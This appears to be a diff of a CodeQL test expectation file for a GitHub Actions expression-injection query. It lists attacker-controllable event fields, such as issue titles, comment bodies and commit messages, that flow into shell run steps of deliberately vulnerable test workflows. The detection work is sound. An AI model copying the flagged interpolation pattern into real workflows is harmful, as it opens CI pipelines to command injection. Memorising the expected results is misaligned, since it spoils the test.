.github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | 
github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| 
.github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... 
test }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... 
ion }}' | -| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... 
title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... 
ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... 
tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... 
utput}} | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. 
| -| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... 
age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... 
nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... 
ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... 
age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... 
ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... 
utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. 
| -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. 
